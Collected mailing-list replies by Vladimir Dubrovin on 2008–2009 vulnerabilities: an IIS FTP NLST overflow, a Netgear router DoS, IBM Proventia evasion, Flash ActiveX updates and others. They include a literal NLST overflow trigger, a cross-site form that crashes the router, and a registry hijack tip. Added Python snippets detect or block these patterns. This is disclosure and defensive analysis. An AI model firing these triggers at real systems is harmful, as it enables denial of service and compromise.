Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-09-02 Thread Vladimir '3APA3A' Dubrovin
Dear Guido Landi,

For DoS - yes, you can use existing file, but it's (almost) impossible
to create reliable code execution exploit since you can not (fully)
control return address, like required in JMP ESP technique used in this
exploit.

--Wednesday, September 2, 2009, 12:33:47 PM, you wrote to 
3ap...@security.nnov.ru:

GL> no, MKDIR is *not* required, also write access is *not* required.

GL> Assuming a directory with a name that starts with "A" exists and that is
GL> at least 14 chars long, this pattern will trigger the overflow:


GL> NLST [Ax206]*/../A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n


GL> At least on win2k3. Therefore, the workarounds for kb975191 on
GL> microsoft.com are wrong.



GL> Guido Landi

GL> Vladimir '3APA3A' Dubrovin wrote:
>> Dear Thierry Zoller,
>> 
>> I think yes, MKDIR is required. It should be variation of
>> S99-003/MS02-018. Fuzzer should be very smart to create directory and
>> use both oversized buffer and ../ in NLST - it makes path longer than
>> MAX_PATH with existing directory.
>> 
>> --Monday, August 31, 2009, 8:21:12 PM, you wrote to
>> full-disclosure@lists.grok.org.uk:
>> 
>> 
>> TZ> Confirmed.
>> 
>> TZ> Ask  yourselves why your fuzzers haven't found that one - Combination of
>> TZ> MKDIR are required before reaching vuln code ?
>> 
>> 
>> 
>> 
>> 

GL> ___
GL> Full-Disclosure - We believe in it.
GL> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
GL> Hosted and sponsored by Secunia - http://secunia.com/


-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
There are versions of Othello in which Desdemona strangles the Moor. (Lem)

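The exchange above turns on the shape of the NLST argument: a long wildcard segment followed by repeated "*/../" hops, so that expansion against an existing directory pushes the path past MAX_PATH. The following is an added example, not code from the thread or from Microsoft, that flags such arguments in FTP command logs. The log line format ("client command argument"), the sample lines, and the threshold of three wildcard-plus-traversal hops are assumptions made for the example.

```python
# Added example: flag FTP NLST/LIST arguments that chain wildcards with "../",
# the shape of the pattern quoted in the thread. Not part of the original post.
import re

MAX_PATH = 260  # Windows MAX_PATH, the limit the thread refers to

# One wildcard segment followed by a parent-directory step, e.g. "AAAA*/../"
GLOB_TRAVERSAL = re.compile(r'[^/\\]*\*[^/\\]*/\.\./')

# Threshold is an assumption for this example; tune it to your own traffic.
SUSPICIOUS_HOPS = 3


def expand_pattern(pattern: str) -> str:
    """Expand the [Ax206] shorthand used in the thread into a literal string."""
    return re.sub(r'\[(.)x(\d+)\]',
                  lambda m: m.group(1) * int(m.group(2)), pattern)


def nlst_risk(argument: str, max_path: int = MAX_PATH) -> dict:
    """Score a single NLST/LIST argument.

    Counts wildcard+traversal hops, records the raw argument length, and
    notes whether the argument alone already exceeds MAX_PATH (the server
    side path becomes longer still once an existing directory name is
    substituted for each wildcard).
    """
    hops = len(GLOB_TRAVERSAL.findall(argument))
    return {
        "hops": hops,
        "length": len(argument),
        "over_max_path": len(argument) >= max_path,
        "suspicious": hops >= SUSPICIOUS_HOPS or len(argument) >= max_path,
    }


# Constructed sample log lines (format assumed: "<client> <command> [argument]")
SAMPLE_LOG = [
    "10.0.0.5 USER anonymous",
    "10.0.0.5 CWD pub",
    "10.0.0.5 NLST *.txt",
    "10.0.0.9 NLST " + expand_pattern(
        "[Ax206]*/../A*/../A*/../A*/../A*/../A*/../A*/../A*/"),
    "10.0.0.7 NLST ../../docs",
]


def scan_log(lines):
    """Return (client, argument, risk) for every flagged NLST/LIST command."""
    flagged = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[1].upper() in ("NLST", "LIST"):
            risk = nlst_risk(parts[2])
            if risk["suspicious"]:
                flagged.append((parts[0], parts[2], risk))
    return flagged


if __name__ == "__main__":
    for client, arg, risk in scan_log(SAMPLE_LOG):
        print(client, risk["hops"], risk["length"], arg[:40] + "...")
```

Only the line carrying the thread's pattern is flagged: it has seven wildcard-plus-traversal hops and is 250 characters long before any expansion, while a plain "../../docs" or "*.txt" argument scores zero hops.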

Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-08-31 Thread Vladimir '3APA3A' Dubrovin
Dear Thierry Zoller,

I think yes, MKDIR is required. It should be variation of
S99-003/MS02-018. Fuzzer should be very smart to create directory and
use both oversized buffer and ../ in NLST - it makes path longer than
MAX_PATH with existing directory.

--Monday, August 31, 2009, 8:21:12 PM, you wrote to 
full-disclosure@lists.grok.org.uk:


TZ> Confirmed.

TZ> Ask  yourselves why your fuzzers haven't found that one - Combination of
TZ> MKDIR are required before reaching vuln code ?





-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
I won't need the sting (S. Lem)


Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

2009-07-16 Thread Vladimir '3APA3A' Dubrovin
Thierry,

 I think inability of antivirus / intrusion detection to catch something
 that is not malware/intrusion or malware in the form unused in-the-wild
 is not a vulnerability. Antivirus (generally) gives no preventive
 protection. They can add signatures for your PoCs to their database -
 and that's how it works.

--Thursday, July 16, 2009, 12:02:35 AM, you wrote to bugt...@securityfocus.com:



TZ> As I received a lot of feedback on this bug, I thought I'd update you. After not replying
TZ> to my notifications and subsequent forced partial disclosure, IBM stated
TZ> officially on their website that they were not affected and to my surprise
TZ> IBM got in contact immediately after disclosure to "coordinate"

TZ> If you read the Timeline till the end, the story has a nice swing.., Drama, insults,
TZ> everything. You could make a soap opera out of it. And you don't even have all the mails.

TZ> What happened during this "coordination" even surprised myself. I am used to discussions,
TZ> I am used to stupid answers. However what happened here bears no description.


TZ> Short Guerilla Version of the Timeline  (complete timeline below):
TZ> ---
TZ> - Hey Thierry sorry, we did not get your report, we'll keep you updated!
TZ> We have IBM written on the proventia boxes but don't send reports to IBM!!

TZ> - Post official statement to IBM website that IBM is NOT affected and
TZ> forgetting to inform Thierry

TZ> - Thierry, You cannot evade proventia, because we use special proprietary
TZ> ingredients!

>> What are these ingredients?

TZ> - We won't tell !! and by the way you suck! your test methods suck! You aren't even
TZ> EAL2 ! A test team costs too much to tests your POCs! Your mails suck! Learn from
TZ> the big mighty IBM.

>> Sorry, the same poc evaded proventia last year! So you must miss something!!

TZ> - Thierry, stop sending us POC files, YOU CANNOT EVADE PROVENTIA, IT is
TZ> IMPOSSIBLE, IRREVOCABLE, PERIOD

>>Silence

TZ> - Thierry here is our report, you DID evade all our proventia products, we 
will
TZ> credit you.



TZ> In the timeline below you find my summary
TZ> -
TZ> 02.04.2009 - Forced partial disclose
TZ> 02.04.2009 - An known contact at IBM asks for the POC
TZ> 02.04.2009 - POC is resend
TZ> 02.04.2009 - An third person is added to the coordination "list"
TZ> 04.04.2009 - Sending another POC file (RAR)
TZ> 06.04.2009 - POC is acknowledged and promise is made to get back
TZ>  once the material has been analysed.
TZ> 10.04.2009 - Sending another POC file (ZIP)
TZ> 10.04.2009 - The third person ergo the "Cyber
TZ> Incident & Vulnerability Handling PM" is taking over coordination

TZ> 14.04.2009 - A comment was made to my blog that indicated IBM did
TZ> answer the Bugtraq posting and negate my findings, having
TZ> received no response from them personally I ask
TZ> "Dear Peter, I was referred to this url in a comment posted to my blog:
TZ> http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5417
TZ> can you confirm this ?"

TZ> 15.04.2009 -  IBM responds:
TZ> "[..] we
TZ> apologize that the path of communicating the disclosure was somewhat
TZ> confusing.  [..]  The IBM contact address in the
TZ> OSVDB is typically used for software products that are in another division
TZ> of IBM, and thus, your report was not routed to us in a timely manner.  In
TZ> the future, we'd prefer that you contact myself directly"

TZ> "We have now investigated the TZO-04-2009-IBM incident you reported and have
TZ> found that we are not susceptible to this evasion."
TZ> "[..]in  this  case,  there  are  other  components in our Proventia
TZ> products that prevent this evasion from occurring"
TZ> "Testing our production products, rather than testing this one
TZ> piece of our technology, then you would have been able to see the same
TZ> results"

TZ> 16.04.2009 - As my tests indicate otherwise I ask "Could you please
TZ> specify which >components< would prevent the evasion, as it is
TZ> hard  to see how to prevent it when the unarchiver code cannot extract
TZ> the code itself" and
TZ> "I  would  be  glad  to do so [Red:test production products] : 
TZ> Please send the respective appliances to "


TZ> 16.04.2009 - IBM answers
TZ> [..] "We are not an open source company, so the internal workings of
TZ> our proprietary software is not something we publicly disclose.  
TZ> We do not provide our products for free to all of the independent 
TZ> testers that might be interested in our product lines--the number 
TZ> of requests simply would not be scalable or manageable if
TZ> we did"

TZ> 17.04.2009 - As I have no way to reproduce and IBM gives no details
TZ> about their OH-SO Secret proprietary software I state that
TZ> "I  cannot  verify  nor  reproduce your statements as such I will leave
TZ> this CVE entry as disputed." "Please provide tangible proof that 
TZ> you de

Re: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface

2009-07-03 Thread Vladimir '3APA3A' Dubrovin
Dear Shaked  Vax,

 Are you sure Radware Team have analysed reflected attack via user's
 browser (AppWall administrator visits malcrafted page, page redirects
 his request to AppWall) before excluding remote vector?

--Thursday, July 2, 2009, 3:23:16 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

SV> Radware team has completed analysis of the reported issue, concluding
SV> that no AppWall customer using the product according to Radware
SV> deployment recommendations would be exposed to vulnerability as a result
SV> of this issue. This is due to the facts that this issue exists only on
SV> the management interface that is recommended to be connected to
SV> internal LAN only, and that it does not allow performing any actions
SV> that would influence machine functionality.
SV>  Nevertheless, in order to enforce our commitment to deliver top
SV> security solution to our customers, Radware will supply a fix for this
SV> issue within its upcoming AppWall release.

SV> Shaked Vax
SV> AppWall Product Manager 
SV> shak...@radware.com 
 



-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
But Harry... I definitely prefer him, for his high nutritional value and
some especially tender meat. (Twain)


Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir '3APA3A' Dubrovin
Adrian,

  If you can execute javascript - what is a reason to wait for user to
  click the link? The message I reply stated there is no need to force
  user to visit Web page and clicking the obfuscated link _sent_ to
  admin is enough. I replied in this case only GET request is possible.
  Read the thread carefully before making conclusions.
  
  
--Wednesday, June 17, 2009, 2:58:15 AM, you wrote to 
jeremi.gos...@motricity.com:

AP> you would be surprised how many people out there (mistakenly) still
AP> think that only GET requests are CSRFable!

AP> 2009/6/16 Jeremi Gosney :
>> Vladimir: "Where there is an open mind, there will always be a frontier." - 
>> Charles Kettering
>>
>> <form method='post' action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'>
>> </form>
>> <a href='#' onclick='document.DoS.submit();'>Google</a>
>>
>>
>>
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> Vladimir Dubrovin
>> Sent: Tuesday, June 16, 2009 9:43 AM
>> To: sr.
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
>>
>> Dear sr.,
>>
>>  clicking on the link can not produce POST request, only GET, unless
>>  there are some special conditions, like cross-site scripting
>>  vulnerability in the router.
>>
>> --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632
>> Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk;
>>
>> s> it could still be carried out remotely by obfuscating a link sent to the
>> s> "admin" of the device. this would obviously rely on the admin clicking on
>> s> the link, and is more of a phishing / social engineering style attack. this
>> s> would also rely on the router being setup with all of the default internal
>> s> LAN ip's.
>>
>> s> sr.
>>
>>
>> s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>
>>
>>>> Dear Tom Neaves,
>>>>
>>>>  It still can be exploited from Internet even if "remote management" is
>>>> only accessible from local network. If you can trick user to visit Web
>>>> page, you can place a form on this page which targets to router and
>>>> request to router is issued from victim's browser.
>>>>
>>>>
>>>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>>>>
>>>> TN> Hi.
>>>>
>>>> TN> I see where you're going but I think you're missing the point a little.  By
>>>> TN> *default* the web interface is enabled on the LAN and accessible by anyone
>>>> TN> on that LAN and the "remote management" interface (for the Internet) is
>>>> TN> turned off.  If the "remote management" interface was enabled, stopping ICMP
>>>> TN> echo responses would not resolve this issue at all, turning the interface
>>>> TN> off would do though (or restricting by IP, ...ack).  The "remote management"
>>>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no amount of
>>>> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to discuss
>>>> TN> this off list with you if its still not clear to save spamming everyone's
>>>> TN> inboxes. :o)
>>>>
>>>> TN> Tom
>>>>
>>>> TN> - Original Message -
>>>> TN> From: Alaa El yazghi
>>>> TN> To: Tom Neaves
>>>> TN> Cc: bugt...@securityfocus.com ;
>>>> full-disclosure@lists.grok.org.uk
>>>> TN> Sent: Monday, June 15, 2009 11:03 PM
>>>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>>>
>>>>
>>>> TN> I know and I understand. What I wanted to mean is that we can not eventually
>>>> TN> access the web interface of a netgear router remotely if we cannot locally.
>>>> TN> As for the DoS, it is simple to solve such attack from outside. We just
>>>> TN> disable receiving pings (There is actually an option in even the lowest
>>>> TN> series) and thus, we would be able to have

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir '3APA3A' Dubrovin
Dear Tom Neaves,

 It still can be exploited from Internet even if "remote management" is
only accessible from local network. If you can trick user to visit Web
page, you can place a form on this page which targets to router and
request to router is issued from victim's browser.


--Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:

TN> Hi.

TN> I see where you're going but I think you're missing the point a little.  By
TN> *default* the web interface is enabled on the LAN and accessible by anyone
TN> on that LAN and the "remote management" interface (for the Internet) is
TN> turned off.  If the "remote management" interface was enabled, stopping ICMP
TN> echo responses would not resolve this issue at all, turning the interface
TN> off would do though (or restricting by IP, ...ack).  The "remote management"
TN> (love those quotes...) interface speaks over HTTP hence TCP so no amount of
TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to discuss
TN> this off list with you if its still not clear to save spamming everyone's
TN> inboxes. :o)

TN> Tom

TN> - Original Message - 
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 11:03 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> I know and I understand. What I wanted to mean is that we can not eventually
TN> access the web interface of a netgear router remotely if we cannot locally.
TN> As for the DoS, it is simple to solve such attack from outside. We just
TN> disable receiving pings (There is actually an option in even the lowest
TN> series) and thus, we would be able to have a remote management without ICMP
TN> requests.



TN> 2009/6/15 Tom Neaves 

TN> Hi.

TN> I'm not quite sure of your question...

TN> The DoS can be carried out remotely, however one mitigating factor (which
TN> makes it a low risk as opposed to sirens and alarms...) is that its turned
TN> off by default - you have to explicitly enable it under "Remote Management"
TN> on the device if you want to access it/carry out the DoS over the Internet.
TN> However, it is worth noting that anyone on your LAN can *remotely* carry out
TN> this attack regardless of this management feature being on/off.

TN> I hope this clarifies it for you.

TN> Tom
TN> - Original Message - 
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 10:45 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> How can it be carried out remotely if it bugs localy?


TN> 2009/6/15 Tom Neaves 

TN> Product Name: Netgear DG632 Router
TN> Vendor: http://www.netgear.com
TN> Date: 15 June, 2009
TN> Author: t...@tomneaves.co.uk 
TN> Original URL:
TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
TN> Discovered: 18 November, 2006
TN> Disclosed: 15 June, 2009

TN> I. DESCRIPTION

TN> The Netgear DG632 router has a web interface which runs on port 80.  This
TN> allows an admin to login and administer the device's settings.  However,
TN> a Denial of Service (DoS) vulnerability exists that causes the web interface
TN> to crash and stop responding to further requests.

TN> II. DETAILS

TN> Within the "/cgi-bin/" directory of the administrative web interface exists a
TN> file called "firmwarecfg".  This file is used for firmware upgrades.  A HTTP POST
TN> request for this file causes the web server to hang.  The web server will stop
TN> responding to requests and the administrative interface will become inaccessible
TN> until the router is physically restarted.

TN> While the router will still continue to function at the network level, i.e. it will
TN> still respond to ICMP echo requests and issue leases via DHCP, an administrator will
TN> no longer be able to interact with the administrative web interface.

TN> This attack can be carried out internally within the network, or over the Internet
TN> if the administrator has enabled the "Remote Management" feature on the router.

TN> Affected Versions: Firmware V3.4.0_ap (others unknown)

TN> III. VENDOR RESPONSE

TN> 12 June, 2009 - Contacted vendor.
TN> 15 June, 2009 - Vendor responded.  Stated the DG632 is an end of life product and is no
TN> longer supported in a production and development sense, as such, there will be no further
TN> firmware releases to resolve this issue.

TN> IV. CREDIT

TN> Discovered by Tom Neaves 



-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
For facts are facts, and they are set down only so that they may be
understood and believed. (Twain)

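The point argued across this thread is that a clicked link only yields a GET, while a form placed on an attacker's page makes the victim's browser issue the POST that reaches /cgi-bin/firmwarecfg on the LAN address, with "Remote Management" off. The following is an added example, not code from the thread, from Netgear, or from the DG632 firmware. It models the two request shapes and shows the Origin/Referer check an admin interface could apply to refuse the cross-site POST. The attacker origin, the header names a browser sends, and the assumption that the router accepts the firmware POST only on that exact path are assumptions made for the example; real 2009 firmware did no such check.

```python
# Added example, not from the thread: link click vs. form POST, and a
# same-origin check that would refuse the cross-site submission.
from dataclasses import dataclass, field
from urllib.parse import urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"    # default LAN address named in the thread
FIRMWARE_CGI = "/cgi-bin/firmwarecfg"    # endpoint that hangs on POST per the advisory


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def request_from_link_click(href: str) -> Request:
    """A plain <a href> navigation: the browser always issues GET."""
    u = urlsplit(href)
    return Request("GET", u.path or "/", {"Host": u.netloc})


def request_from_form_submit(action: str, attacker_origin: str) -> Request:
    """A hidden <form method=post> submitted by script on the attacker's page.

    The browser issues POST to the router and labels where the submission
    came from (Origin in modern browsers, Referer in older ones).
    """
    u = urlsplit(action)
    return Request("POST", u.path or "/", {
        "Host": u.netloc,
        "Origin": attacker_origin,
        "Referer": attacker_origin + "/",
    })


def reaches_vulnerable_code(req: Request) -> bool:
    """Assumption for the example: only a POST to firmwarecfg triggers the hang."""
    return req.method == "POST" and req.path == FIRMWARE_CGI


def allow_state_change(req: Request, own_origin: str = ROUTER_ORIGIN) -> bool:
    """Hardened check an admin interface could apply to every non-GET request.

    Accept only when the browser-supplied Origin (or, failing that, Referer)
    names the interface itself. A same-origin form submission carries at least
    one of the two; a cross-site one carries the attacker's origin; a request
    carrying neither is refused rather than trusted.
    """
    if req.method == "GET":
        return True
    origin = req.headers.get("Origin")
    if origin is None:
        referer = req.headers.get("Referer")
        if referer is None:
            return False
        u = urlsplit(referer)
        origin = f"{u.scheme}://{u.netloc}"
    return origin == own_origin


if __name__ == "__main__":
    link = request_from_link_click(ROUTER_ORIGIN + FIRMWARE_CGI)
    csrf = request_from_form_submit(ROUTER_ORIGIN + FIRMWARE_CGI,
                                    "http://attacker.example")
    print("link click reaches bug:", reaches_vulnerable_code(link))
    print("form POST reaches bug:", reaches_vulnerable_code(csrf))
    print("form POST allowed by origin check:", allow_state_change(csrf))
```

The check keys on headers the victim's browser adds on its own, so it holds even though the attack page can choose the form's action and fields freely; it does not help against a script that already runs inside the router's own origin, which is the cross-site scripting case Vladimir sets apart.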

Re: [Full-disclosure] Addendum : [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)

2009-05-27 Thread Vladimir '3APA3A' Dubrovin
Dear Jim Parkhurst,

It may depend on video card and video drivers and/or amount of
memory/video memory. 9 years ago there was vulnerability in Internet
Explorer with displaying scaled image:
http://securityvulns.com/advisories/ie5freeze.asp results were also
different on different hardware. In some cases even mouse cursor was
frozen and reboot was only option.


--Wednesday, May 27, 2009, 7:56:56 PM, you wrote to c...@cert.org:

JP> If I understand the process, saving the text at [IV. Proof of
JP> concept] (following the "~~~..." to an .XHTML file, and launch the
JP> file using Firefox, I should lose functionality ("Browser doesn't
JP> respond any longer to any user input, all tabs are no longer
JP> accessible, your work if any  (hail to the web 2.0) might be lost.")

JP> Using FF2.0.0.20 and the file does not result in loss of use.
JP> All tabs are functional. All JAVA links continue function.  Same
JP> result for naming the POC file to .HTML, .HTM.

 Thierry Zoller  05/26/2009 13:13 >>>


JP> For  those that failed to reproduce, try naming the POC file with an XHTML
JP> extension.



-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
The machine turned out to be capable of a single operation, namely
multiplying 2x2, and even then it made mistakes. (Lem)


Re: [Full-disclosure] Windows Update (re-)installs outdated Flash ActiveX on Windows XP

2009-04-22 Thread Vladimir '3APA3A' Dubrovin
Dear Stefan Kanthak,

As far as I can see, Internet Explorer actually uses flash10b.ocx.
Adobe Flash Player 10.0 r22

--Monday, April 20, 2009, 8:17:24 PM, you wrote to bugt...@securityfocus.com:

SK> Windows Update (as well as Microsoft Update and the Automatic Update)
SK> installs an outdated (and from its manufacturer unsupported) Flash
SK> Player ActiveX control on Windows XP.


SK> Although this fact is nothing really new it but shows the lack of taking
SK> care for security problems and in general the chuzpe of many software
SK> "producers" to ship their "products" with outdated and often vulnerable
SK> components.


SK> The ouverture:

SK> * Windows XP RTM (i.e. the original release version without any service
SK>   packs) installs a Flash Player ActiveX control SWFLASH.OCX v5.0r42

SK> * Windows XP Service Pack 1 updates the SWFLASH.OCX to v5.0r44

SK> * Windows XP Service Pack 2 (released in August 2004) replaces the
SK>   SWFLASH.OCX with FLASH.OCX v6.0r79

SK> * security update KB913433 (see
SK> 
SK>   and
SK> )
SK>   updates FLASH.OCX to 6.0r84

SK> * security update KB923789 (see
SK> 
SK>   and
SK> )
SK>   updates FLASH.OCX to 6.0r88

SK> * Windows XP Service Pack 3 (released in April 2008) contains the same
SK>   FLASH.OCX v6.0r79 as Service Pack 2, i.e. none of the security updates
SK>   published after Service Pack 2 were incorporated!
SK>   The MSKB article KB948460 but STILL states wrong that KB913433 (sic!)
SK>   is included in Service Pack 3

SK> To my knowledge Adobe stopped direct support for Flash Player 6 in late
SK> 2005, the newest version of Flash Player ActiveX 6.0 available on their
SK> web site  is 6.0r79 from 2005-11-11.
SK> Later versions of Flash Player ActiveX 6.0 were available from Microsoft
SK> only:
SK> 
SK> and 

SK> I doubt that these outdated Flash Player ActiveX controls are safe and
SK> not vulnerable to current exploits, so Microsoft puts its customers
SK> clearly at risk.


SK> The unhappy end:

SK> * Start with a fully patched Windows XP with Service Pack 3 AND the
SK>   current Adobe Flash Player ActiveX v10.0r22.87 installed.

SK>   Since recent Flash Player installers remove any older versions of the
SK>   ActiveX control this means that neither FLASH.OCX nor SWFLASH.OCX are
SK>   present in %SystemRoot%\System32\Macromed\ or
SK>   %SystemRoot%\System32\Macromed\Flash\

SK> * Install an arbitrary software product that installs a Flash Player
SK>   ActiveX prior to 6.0r88 (there are MANY software products that do so).

SK>   For example, get the current MSN CD-ROM "MSN 9.6-PROD", part no.
SK>   X14-85160-02 DE from Microsoft; this CD-ROM contains the product
SK>   "Digital Image Standard Edition 2006" v11.1 from 2007-01-29, which
SK>   installs an outdated and VULNERABLE FLASH.OCX v6.0r29 to
SK>   %SystemRoot%\System32\Macromed\!

SK>   Note that the installer was created AFTER KB923789, which but was not
SK>   incorporated. Does Microsoft really care about security?

SK>   If you don't want to order the MSN CD-ROM a trial version of "Digital
SK>   Image Starter Edition 2006" is available from
SK>  
SK> 


SK>   If you don't want to install such a big product either, get the
SK>   Windows Update KB913433 from
SK>  
SK> 

SK>   extract the Flash Player ActiveX installer INSTALL_FP6_WU.EXE from
SK>   the package and run the installer.

SK>   The attempt to install a Flash Player ActiveX prior to 6.0r88 over a
SK>   later version does not YET do any harm, since starting with 6.0r88 Adobe
SK>   sets deny ACLs on the
SK> %SystemRoot%\System32\Macromed\Flash\FLASH*.OCX
SK>   as well as all the registry entries which prevent earlier Flash Player
SK>   ActiveX installers to overwrite them, so any Flash Player ActiveX
SK>   6.0r88 and later is preserved.

SK>   Any of the above mentioned products but installs the previously not
SK>   existent file %SystemRoot%\System32\Macromed\Flash\FLASH*.OCX

SK> * Visit  (or wait till the daily
SK>   run of the Automatic Update) and install the Windows Update KB923789.

SK>   This but DOES harm: since the Flash Player ActiveX installer that has
SK>   been wrapped in KB923789 (re-)sets the ACLs it overwrites the registry
SK>   entries of the newer/recent Flash Player ActiveX. DAMAGE DONE!


SK> I informed Microsoft in the last two years several times about this
SK> problem and discussed it with various members of their Microsoft Security
SK> R

Re: [Full-disclosure] iDefense Security Advisory 10.30.08: Adobe PageMaker Key Strings Stack Buffer Overflow

2008-11-02 Thread Vladimir '3APA3A' Dubrovin
Dear iDefense Labs,



--Thursday, October 30, 2008, 11:24:35 PM, you wrote to [EMAIL PROTECTED]:


iL> VII. CVE INFORMATION

iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the
iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in
iL> the CVE list (http://cve.mitre.org/), which standardizes names for
iL> security problems.

I bet it should be CVE-2007-6432

-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] Local persistent DoS in Windows XP SP2 Taskmanager

2008-03-15 Thread 3APA3A
Dear SkyOut,

I see no security impact here.

RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
"SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey);

requires administrative privileges. If user has ones, you can achieve
better results by deleting task manager or trojaning it.

You can also use

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image
File Execution Options\taskmgr.exe\Debug

key to launch notepad.exe instead of taskmgr.exe.

--Friday, March 14, 2008, 10:49:31 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

S> Dear list,

S> after weeks of total ignorance by Microsoft I decided to finally  
S> release all information
S> related to a bug, that has to do with the Windows XP SP2 Taskmanager.
S> Manipulating
S> a Registry key makes it possible to disable the Taskmgr. On the next
S> startup it will crash with
S> an error message. It is possible to backup the key and repair the  
S> Registry doing so, but
S> the attack scenario is clear: A virus uses this code, the user can't
S> open the Taskmgr anymore
S> and your process is somehow "hidden".

S> The full information about this bug, can be found here:
S> http://core-security.net/archive/2008/march/index.php#14032008

S> And the exploit is available here:
S> http://core-security.net/releases/exploits/taskmgr_dos.c.txt

S> Greets,
S> SkyOut

S> ---
S> core-security.net
S> ---


-- 
~/ZARAZA http://securityvulns.com/
ENIACs - a punch in the face! (Lem)


Re: [Full-disclosure] [FDSA] Multiple Vulnerabilities in Your Computer (all versions)

2008-01-15 Thread 3APA3A



Well, I can't say it's all fake... It's all junk.

FD> OpenSSL 0.9.7j
FD>   openssl-0.9.7j/fips-1.0/aes/fips_aesavs.c 973: User supplied data
FD> copied into fixed length buffer on the stack with no length
FD> verification.

Buffer  overflow in non-suid test application (not compiled by default).
Not security.

FD> SSH 3.2.9.1
FD>   ssh-3.2.9.1/lib/zlib/contrib/minizip/minizip.c 187: User supplied
FD> data copied into fixed length buffer on the stack with no length
FD> verification.

Identical to CVE-2007-1657 and is probably fixed at the same time. Local
overflow in non-suid application (minizip). Does not affect SSH. Only this
one can be considered as low risk vulnerability.

FD> Apache 1.3.37
FD>   src/regex/split.c 164: User supplied data copied into fixed length
FD> buffer on the stack with no length verification.

Local buffer overflow in non-suid test application, which is not
compiled by default. Not security.

FD> Samba 3.0.25b
FD>   samba-3.0.25b/source/popt/poptparse.c 27: Integer overflow in size_t
FD> which is later used in heap allocation. Buffer then copied into this
FD> memory resulting in heap overflow.

This one is fake.

size_t nb = (argc + 1) * sizeof(*argv);

...

nb += strlen(argv[i]) + 1;

...

dst = malloc(nb);

Mathematical proof:

nb <= memory already allocated for argc and argv < size of address space
nb < size of address space
QED


-- 
~/ZARAZA http://securityvulns.com/
We will always be glad to hear your chirping (Twain)


Re: [Full-disclosure] what is this?

2008-01-14 Thread 3APA3A
Dear Jose Nazario,


JN> the file you sent here contains a bunch of embedded nulls (every other
JN> character is 00). stripping those out reveals ...  jose

JN> nazario, ph.d.   http://monkey.org/~jose/

This is Little Endian UCS-2 Unicode, not a bunch of embedded nulls.
Never stop educating yourself.

-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] what is this?

2008-01-14 Thread 3APA3A
Dear Nick FitzGerald,

--Monday, January 14, 2008, 2:52:23 PM, you wrote to 
full-disclosure@lists.grok.org.uk:


NF> U -- the only part of that likely to be relevant here is the last.

NF> These kinds of web page "compromises" are typically achieved through
NF> bad/ill-configured/non-updated server-side web applications (or
NF> their underlying script engines) and are typically achieved without
NF> requiring any more special or privileged access to the victim sites
NF> than the ability to run a clever Google search or your own
NF> brute-force spidering via a bot-net, etc.

During last few months, we monitor mass infection attempts through
stolen FTP passwords.

Yes, web exploitation scenario is also possible. These are automated
exploitation requests received during a single day:

http://securityvulns.com/files/exprequests.txt

In this case there is a quick workaround (and also a good security
practice) of disabling write access for web server account. Of course,
investigation is required anyway.


-- 
~/ZARAZA http://securityvulns.com/
We will always be glad to hear your chirping (Twain)


Re: [Full-disclosure] what is this?

2008-01-14 Thread 3APA3A
Dear crazy frog crazy frog,

  Clean your computer from trojan, change FTP password for your site
  hosting access, because it's stolen, access your hosting account via
  FTP and remove additional text (usually at the end of the file, after
  ) from all HTML/PHP pages.

--Sunday, January 13, 2008, 7:01:34 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

cfcf> Hi,

